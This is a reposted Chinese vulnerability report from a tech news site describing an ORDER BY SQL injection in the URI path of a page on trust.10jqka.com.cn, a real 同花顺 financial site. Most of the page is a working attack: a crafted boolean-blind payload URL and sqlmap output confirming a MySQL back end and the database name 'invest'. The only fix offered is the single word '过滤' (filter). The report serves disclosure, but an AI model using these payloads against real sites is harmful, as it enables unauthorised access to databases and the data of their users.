当前位置: 移动技术网 > 网络运营>安全>网站安全 > 同花顺某站一处URI注入

同花顺某站一处URI注入

2018年01月22日  | 移动技术网网络运营  | 我要评论

URI处的order by注入

原始请求
https://trust.10jqka.com.cn/xtcp/_0_0_0_0_all_yqsyl_desc_1.shtml

desc处存在order by注入,构造payload

https://trust.10jqka.com.cn/xtcp/_0_0_0_0_all_yqsyl_desc,1-if(1=1,1,(select+1+union+select+2))_1.shtml

sqlmap获取数据如下
sqlmap identified the following injection points with a total of 0 HTTP(s) requests:
---
Parameter: #1* (URI)

Type: boolean-based blind

Title: AND boolean-based blind - WHERE or HAVING clause

Payload: https://trust.10jqka.com.cn:80/xtcp/_0_0_0_0_all_yqsyl_desc,1-if(1=1 AND 7128=7128,1,(select+1+union+select+2))_1.shtml
---
[21:52:58] [WARNING] changes made by tampering scripts are not included in shown payload content(s)

[21:52:58] [INFO] testing MySQL

[21:52:58] [INFO] confirming MySQL

[21:52:58] [INFO] the back-end DBMS is MySQL

back-end DBMS: MySQL >= 5.0.0

[21:52:58] [INFO] fetching current database

[21:52:58] [INFO] resumed: invest

current database: 'invest'

[21:52:58] [INFO] fetched data logged to text files under '/root/.sqlmap/output/trust.10jqka.com.cn'

[*] shutting down at 21:52:58

解决方案:

过滤

如对本文有疑问, 点击进行留言回复!!

相关文章:

验证码:
移动技术网